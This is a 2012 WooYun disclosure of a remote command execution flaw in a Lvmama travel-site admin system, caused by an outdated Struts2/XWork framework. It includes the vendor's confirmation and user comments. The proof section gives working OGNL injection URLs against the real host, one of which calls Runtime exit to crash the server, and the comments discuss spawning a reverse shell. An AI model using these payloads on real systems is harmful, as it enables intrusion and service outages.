当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-07183

漏洞标题:驴妈妈某管理系统远程代码执行

相关厂商:驴妈妈旅游网

漏洞作者: shine

提交时间:2012-06-11 15:45

修复时间:2012-07-26 15:46

公开时间:2012-07-26 15:46

漏洞类型:命令执行

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-06-11: 细节已通知厂商并且等待厂商处理中
2012-06-11: 厂商已经确认,细节仅向厂商公开
2012-06-21: 细节向核心白帽子及相关领域专家公开
2012-07-01: 细节向普通白帽子公开
2012-07-11: 细节向实习白帽子公开
2012-07-26: 细节向公众公开

简要描述:

如题!

详细说明:

使用的struts2或webWork框架版本过低,底层的Xwork远程执行命令!

漏洞证明:

http://pcadmin.lvmama.com/pc/login!chekLogin.do?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.sleep(999999999)')(\u0023rt\u003d@java.lang.Thread@currentThread()))=1
进一步确认(关闭web服务器命令):

http://pcadmin.lvmama.com/pc/login!chekLogin.do?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

修复方案:

检查全网补丁是否及时!

版权声明:转载请注明来源 shine@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2012-06-11 15:58

厂商回复:

非常感谢各位的提醒,这个问题我们前段时间我们已经发现,并进行了针对性的版本升级,但是由于某应用比较复杂,如要修改需要改动很大,所以该应用的版本并没有升级,仅仅做了一些访问限制,但是最近又开放了所有权限,导致了该漏洞的继续存在。
我们会马上解决这个问题。

最新状态:

暂无

漏洞评价:

评论

  1. 2012-05-16 13:21 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    @xsser 别把标题改得太明显了啊!

  2. 2012-05-16 13:24 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @shine 下次补个图撒

  3. 2012-05-16 13:25 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    @xsser 恩!

  4. 2012-05-16 14:24 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    恭喜第二个旅游类网站进驻乌云

  5. 2012-05-16 14:34 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @horseluke 他们一定不这么想

  6. 2012-05-16 14:48 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    有时,要看厂商高层领导是什么出身!去哪儿网,之所以态度好,主要他们的创始人是做技术出身的,直接影响底层!

  7. 2012-05-16 16:03 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    @shine 这次真要给你送驴了~

  8. 2012-05-16 21:11 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    补个图:http://cache.aries.sina.com.cn/datagames_d/20120516/0f079e37d552b0358dc419a88f544ce2.png负载集群:(nginx + tomcat)

  9. 2012-05-16 21:12 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    还是新浪好,百度借个图片存储空间还要屏蔽外部用户!

  10. 2012-05-16 21:25 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    由于采取的是应用集群,所以图中也没直接暴露目标!厂商勿怪!

  11. 2012-05-16 21:42 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @shine 我嘞个去。

  12. 2012-05-17 18:01 | livers ( 实习白帽子 | Rank:94 漏洞数:6 | mov esp,0jmp espcrash.....)

    @shine你能弹回shell 么

  13. 2012-05-18 17:55 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    @livers 要看场景!

  14. 2012-05-18 18:32 | livers ( 实习白帽子 | Rank:94 漏洞数:6 | mov esp,0jmp espcrash.....)

    @shine 就是这个 我试了下 不好弹回来

  15. 2012-05-18 18:48 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    @livers 恩!shell弹不回,可能是权限问题,还是其他原因限制了!

  16. 2012-05-18 19:29 | livers ( 实习白帽子 | Rank:94 漏洞数:6 | mov esp,0jmp espcrash.....)

    @shine 应该是nc 被阉割了 可以试试zone里面提到的 用telnet 绑定 csh那个